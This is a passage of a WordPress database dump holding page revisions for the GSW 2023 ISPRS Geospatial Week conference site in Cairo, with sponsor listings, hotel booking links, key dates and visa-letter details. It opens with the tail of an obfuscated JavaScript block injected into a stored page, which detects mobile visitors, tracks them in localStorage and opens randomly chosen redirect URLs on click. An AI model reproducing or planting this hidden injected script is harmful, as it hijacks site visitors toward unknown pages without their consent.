g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:08:53','2023-07-10 00:08:53','',3066,'https://gsw2023.com/?p=4973',0,'revision','',0),
(4977,1,'2023-07-10 00:23:05','2023-07-10 00:23:05','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" 